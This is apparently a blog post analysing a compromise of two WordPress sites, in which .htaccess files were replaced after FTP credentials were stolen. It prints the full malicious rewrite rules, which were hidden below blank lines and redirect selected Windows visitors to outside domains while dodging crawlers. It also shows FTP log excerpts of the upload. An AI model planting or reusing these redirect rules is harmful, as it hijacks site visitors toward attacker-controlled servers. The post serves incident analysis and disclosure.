oKLabs

I recently met traces of an “unknown” malware.. Here is the story..

A friend of mine, who manage two websites under WordPress, asked me for help, because every link of both of his websites felt with a 404 error.

So, i checked his wordpress backends, every thing looked OK ! & Links worked well when default links was used (Permalink Settings), but felt again when Rewrite was used.

This led me to check the .htaccess of the sites roots and there, i met the really interesting thing.

The classic wordpress .htaccess file was replaced by a bigger file , apparently empty (just about 1000 blank lines before the payload) but contains the following lines :

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.|hi5\.|friendster\.|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR} !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR} !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*kDS.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://wachanakamol.davidsrestaurantservice.com/url?sa=t&source=web&cd=7&ved=0bQrpcOkx&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25QhfqvK5ayxpY2MyVAy8p+1pw==&usg=BEvVXpmukJX1oRhqtii6jh&sig2=ifwaaxXXaUONMWfft0cgDE [R=302,L,CO=kDS:54:%{HTTP_HOST}:10834:/:0:HttpOnly]
</IfModule>
#2ca5ded434c4365d3fc149a90fc728db01025fd66cdf5a75e4d25a31

The most interesting lines here in red. One the second site, the .htaccess is the same, only theses lines are replaced by :

RewriteRule ^(.*)$ http://zeeney.carolinadreamrealestate.com/url?sa=N&source=web&cd=9&ved=0c9pzP3qY&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25QhfqvK5ayxqI2MyVEx8pm1pw==&usg=NAREIfxSo00kpDvVZAcvFo&sig2=e9Fs8HR4bNMjvVXsxeFBa- [R=302,L,CO=fpF:63:%{HTTP_HOST}:9903:/:0:HttpOnly]
…
#c3774cb6de5ddbb21349afc2427d5a0e82fc52d054415d257dad480d

As Google didn’t found anything about nor the hashes, nor the domains of the redirections, a quick lookup shown that the domains leads to servers in Turkey.

Here is an extract of the FTP logs when the htaccess modification occured :

[2012 May 12 03:25:43] pure-ftpd: ([MAIN_FTP_USER]@120.141.90.198) [DEBUG] Command [epsv] []
[2012 May 12 03:25:44] pure-ftpd: ([MAIN_FTP_USER]@120.141.90.198) [INFO] Logout.
[2012 May 12 03:25:45] pure-ftpd: (?@60.52.38.159) [INFO] [MAIN_FTP_USER] is now logged in
[2012 May 12 03:25:46] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [pwd] []
[2012 May 12 03:25:47] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [type] [i]
[2012 May 12 03:25:48] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [cwd] [www]
[2012 May 12 03:25:49] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [epsv] []
[2012 May 12 03:25:50] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [type] [A]
[2012 May 12 03:25:51] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [list] [-a]
[2012 May 12 03:25:54] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [type] [i]
[2012 May 12 03:25:55] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [cwd] [/]
[2012 May 12 03:25:56] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [cwd] [www]
[2012 May 12 03:25:58] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [cwd] [fb]
[2012 May 12 03:25:59] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [DEBUG] Command [epsv] []
[2012 May 12 03:26:00] pure-ftpd: ([MAIN_FTP_USER]@60.52.38.159) [INFO] Logout.
[2012 May 12 03:26:06] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [DEBUG] Command [cwd] [v2]
[2012 May 12 03:26:06] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [DEBUG] Command [epsv] []
[2012 May 12 03:26:06] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [DEBUG] Command [stor] [.htaccess]
[2012 May 12 03:26:06] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [NOTICE] /homez.***/[SITE_NAME]//www/v2/.htaccess uploaded (5453 bytes, 39.20KB/sec)
[2012 May 12 03:26:06] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [DEBUG] Command [site] [CHMOD 0444 /www/v2/.htaccess]
[2012 May 12 03:26:06] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [DEBUG] Command [epsv] []
[2012 May 12 03:26:07] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [DEBUG] Command [size] [.htaccess]
[2012 May 12 03:26:07] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [DEBUG] Command [retr] [.htaccess]
[2012 May 12 03:26:07] pure-ftpd: ([MAIN_FTP_USER]@78.88.217.16) [NOTICE] /homez.***/[SITE_NAME]//www/v2/.htaccess downloaded (5453 bytes, 85905.72KB/sec)

As you can see there is connection from two different towns in Malaisya and from Poland (the websites are from France).

Same scheme on the other site.

I assume that a “worm” stole FTP access on my friend computer, and use them to send informations/command to botnet controllers via URL Rewrite upon any traffic on the infected websites.

So the question is : Does this remind you of any malware, or it is an unknown malware in growth !!